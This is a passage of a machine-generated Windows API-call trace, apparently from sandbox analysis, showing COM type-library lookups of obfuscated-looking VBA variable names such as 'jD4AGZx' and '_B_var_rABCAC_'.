cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jD4AGZx") returned 8 [0069.768] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jD4AGZx", lHashVal=0x10b8e3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d7e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jD4AGZx") returned 8 [0069.768] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jD4AGZx", lHashVal=0x10b8e3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.768] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jD4AGZx") returned 0x10b8e3 [0069.768] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jD4AGZx" | out: _Dst="jD4AGZx") returned 0x0 [0069.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jD4AGZx") returned 8 [0069.768] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.768] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jD4AGZx", lHashVal=0x10b8e3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.768] IUnknown:Release (This=0x665ba50) returned 0xd [0069.768] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.768] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jD4AGZx", lHashVal=0x10b8e3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.768] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.768] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.768] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jD4AGZx", lHashVal=0x10b8e3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.768] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.768] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.768] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jD4AGZx", lHashVal=0x10b8e3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.768] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d7e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jD4AGZx") returned 8 [0069.769] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jD4AGZx", lHashVal=0x10b8e3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.769] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.769] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81d7e | out: _Dst=0x67c2d40) returned 0x0 [0069.769] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jD4AGZx") returned 0x10bc67 [0069.769] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="JoQZQUw", cchCount1=-1, lpString2="_B_var_jD4AGZx", cchCount2=-1) returned 3 [0069.769] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jD4AGZx" | out: _Dst="_B_var_jD4AGZx") returned 0x0 [0069.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jD4AGZx") returned 15 [0069.769] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.769] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jD4AGZx", lHashVal=0x10bc67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.769] IUnknown:Release (This=0x665ba50) returned 0xd [0069.769] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.769] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jD4AGZx", lHashVal=0x10bc67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.769] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.769] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.769] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jD4AGZx", lHashVal=0x10bc67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.769] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.769] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.769] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jD4AGZx", lHashVal=0x10bc67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.769] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.769] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.769] IUnknown:Release (This=0x665ba50) returned 0xd [0069.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8711ee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_jD4AGZx") returned 15 [0069.769] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jD4AGZx", lHashVal=0x10bc67, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0) returned 0x0 [0069.769] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81d7e | out: _Dst=0x144ec0) returned 0x0 [0069.770] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rABCAC_", lHashVal=0x10d59e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e76, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rABCAC_") returned 8 [0069.770] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rABCAC_", lHashVal=0x10d59e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e76, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rABCAC_") returned 8 [0069.770] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rABCAC_", lHashVal=0x10d59e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.770] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rABCAC_") returned 0x10d59e [0069.770] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="rABCAC_" | out: _Dst="rABCAC_") returned 0x0 [0069.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="rABCAC_") returned 8 [0069.770] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.770] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="rABCAC_", lHashVal=0x10d59e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.770] IUnknown:Release (This=0x665ba50) returned 0xd [0069.770] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.770] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="rABCAC_", lHashVal=0x10d59e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.770] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.770] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.770] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="rABCAC_", lHashVal=0x10d59e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.770] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.770] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.770] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="rABCAC_", lHashVal=0x10d59e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.770] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e76, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rABCAC_") returned 8 [0069.770] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rABCAC_", lHashVal=0x10d59e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.770] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.771] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81e76 | out: _Dst=0x67c2d40) returned 0x0 [0069.771] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rABCAC_") returned 0x10c9a1 [0069.771] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_rABCAC_" | out: _Dst="_B_var_rABCAC_") returned 0x0 [0069.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_rABCAC_") returned 15 [0069.771] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.771] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_rABCAC_", lHashVal=0x10c9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.771] IUnknown:Release (This=0x665ba50) returned 0xd [0069.771] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.771] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_rABCAC_", lHashVal=0x10c9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.771] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.771] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.771] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_rABCAC_", lHashVal=0x10c9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.771] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.771] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.771] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_rABCAC_", lHashVal=0x10c9a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.771] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.771] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.771] IUnknown:Release (This=0x665ba50) returned 0xd [0069.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87121e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_rABCAC_") returned 15 [0069.771] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rABCAC_", lHashVal=0x10c9a1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x41004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x41004300000000, pDummy=0x0) returned 0x0 [0069.771] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81e76 | out: _Dst=0x144ec0) returned 0x0 [0069.771] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Akc4XAA", lHashVal=0x100b07, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e4e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="Akc4XAA") returned 8 [0069.771] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Akc4XAA", lHashVal=0x100b07, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e4e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="Akc4XAA") returned 8 [0069.772] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Akc4XAA", lHashVal=0x100b07, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.772] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Akc4XAA") returned 0x100b07 [0069.772] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="Akc4XAA" | out: _Dst="Akc4XAA") returned 0x0 [0069.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="Akc4XAA") returned 8 [0069.772] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.772] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Akc4XAA", lHashVal=0x100b07, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.772] IUnknown:Release (This=0x665ba50) returned 0xd [0069.772] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.772] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Akc4XAA", lHashVal=0x100b07, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.772] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.772] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.772] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Akc4XAA", lHashVal=0x100b07, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.772] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.772] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.772] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="Akc4XAA", lHashVal=0x100b07, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.772] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e4e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="Akc4XAA") returned 8 [0069.772] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Akc4XAA", lHashVal=0x100b07, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.772] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.772] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81e4e | out: _Dst=0x67c2d40) returned 0x0 [0069.772] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Akc4XAA") returned 0x10ff49 [0069.772] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_Akc4XAA" | out: _Dst="_B_var_Akc4XAA") returned 0x0 [0069.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_Akc4XAA") returned 15 [0069.772] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.772] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Akc4XAA", lHashVal=0x10ff49, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.773] IUnknown:Release (This=0x665ba50) returned 0xd [0069.773] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.773] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_Akc4XAA", lHashVal=0x10ff49, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.773] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.773] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.773] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_Akc4XAA", lHashVal=0x10ff49, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.773] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.773] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.773] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_Akc4XAA", lHashVal=0x10ff49, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.773] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.773] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.773] IUnknown:Release (This=0x665ba50) returned 0xd [0069.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87124e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_Akc4XAA") returned 15 [0069.773] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Akc4XAA", lHashVal=0x10ff49, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x58003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x58003400000000, pDummy=0x0) returned 0x0 [0069.773] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81e4e | out: _Dst=0x144ec0) returned 0x0 [0069.773] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iDAc_DAA", lHashVal=0x109025, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e9e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iDAc_DAA") returned 9 [0069.773] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iDAc_DAA", lHashVal=0x109025, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e9e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iDAc_DAA") returned 9 [0069.773] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iDAc_DAA", lHashVal=0x109025, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.773] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iDAc_DAA") returned 0x109025 [0069.774] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="iDAc_DAA" | out: _Dst="iDAc_DAA") returned 0x0 [0069.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="iDAc_DAA") returned 9 [0069.774] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.774] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iDAc_DAA", lHashVal=0x109025, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.774] IUnknown:Release (This=0x665ba50) returned 0xd [0069.774] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.774] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iDAc_DAA", lHashVal=0x109025, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.774] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.774] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.774] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iDAc_DAA", lHashVal=0x109025, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.774] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.774] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.774] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iDAc_DAA", lHashVal=0x109025, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.774] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e9e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iDAc_DAA") returned 9 [0069.774] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iDAc_DAA", lHashVal=0x109025, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.774] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.774] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81e9e | out: _Dst=0x67c2d40) returned 0x0 [0069.774] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iDAc_DAA") returned 0x1067ae [0069.774] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_iDAc_DAA" | out: _Dst="_B_var_iDAc_DAA") returned 0x0 [0069.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_iDAc_DAA") returned 16 [0069.774] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.774] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iDAc_DAA", lHashVal=0x1067ae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.774] IUnknown:Release (This=0x665ba50) returned 0xd [0069.774] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.774] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iDAc_DAA", lHashVal=0x1067ae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.774] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.774] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.775] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iDAc_DAA", lHashVal=0x1067ae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.775] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.775] 